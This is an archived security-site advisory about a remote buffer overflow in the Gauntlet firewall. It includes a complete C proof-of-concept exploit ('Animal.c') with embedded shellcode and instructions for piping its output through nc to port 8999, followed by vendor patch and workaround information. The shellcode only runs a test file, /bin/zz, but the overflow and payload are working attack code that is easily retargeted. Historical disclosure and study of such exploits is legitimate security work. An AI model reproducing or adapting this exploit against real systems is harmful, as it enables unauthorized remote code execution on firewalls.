TUCoPS :: Unix :: General :: gauntl5.htm

TUCoPS :: Unix :: General :: gauntl5.htm
Gauntlet buffer overflow
Vulnerability
 Gauntlet
Affected
 Gauntlet
Description
 This was posted to the Guantlet User list. The claim is that
 there is no exploit "in the wild" and that the only holders of
 the code are NAI and Garrison Tech, and they don't plan to
 release it which is not truth (see below). Of course, nobody else
 will figure it out, right? Nice to have a buffer overflow in a
 firewall in any case.
 Below is proof of concept code. Since this exploit exists, it
 gives us new fear that there is probably more to come. Security
 verdors need to pay better attention to the code they put out.
 Pix, Checkpoint, Gauntlet, all have exploits that came out this
 year.
 So here it is, script kiddies don't bother, this code wont help
 you. It is written to run a test file called /bin/zz
 Just throw a file called zz in /bin on the gauntlet firewall and
 chmod it to 700. Inside the zz file you should have it do
 something where it will leave you a log. Here is a real simple
 example.
 #!/bin/sh
 echo "IT RAN"> /tmp/TEST
 And here comes exploit:
 /*
 * Animal.c
 *
 *
 * Remote Gauntlet BSDI proof of concept exploit.
 * Garrison technologies may have found it, but I am the
 * one who released it. ;) I do not have a Sparc or I would
 * write up the Solaris one too. If you have one, please
 * make the changes needed and post it. Thanks.
 *
 * Script kiddies can go away, this will only execute a file
 * named /bin/zz on the remote firewall. To test this code,
 * make a file named /bin/zz and chmod it to 700.
 * I suggest for the test you just have the zz file make a note
 * in syslog or whatever makes you happy.
 *
 * This code is intened for proof of concept only.
 *
 *
 * _Gramble_
 * Hey BuBBles
 *
 *To use:
 * # Animal | nc <address> 8999
 */
 
 
 #include <stdio.h>
 
 
 char data[364];
 
 main() {
 int i;
	 char shelloutput[80];
 
 
 /* just borrowed this execute code from another exploit */
 
	 unsigned char shell[] =
 "\x90"
	 "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
	 "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
	 "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";
 
 
 for(i=0;i<264;i++)
 data[i]=0x90;
		 data[i]=0x30;i++;
		 data[i]=0x9b;i++;
		 data[i]=0xbf;i++;
		 data[i]=0xef;i++;
		 data[i] = 0x00;
	 for (i=0; i<strlen(shell); i++)
		 shelloutput[i] = shell[i];
		 shelloutput[i] = 0x00;
 
	 printf("10003.http://%s%s", data, shelloutput);
 
 
 }
Solution
 Patches are available from
 http://www.tis.com/support/patchpage.html
 the patch you need is cyber.patch for whatever version you are
 currently running. There is no released patch for Gauntlet 4.1,
 however if you refer to the advisory you can implement the
 workaround detailed in that advisory.
 Network Associates released a patch to address this issue. See:
 http://www.pgp.com/jump/gauntlet_advisory.asp
 for further information.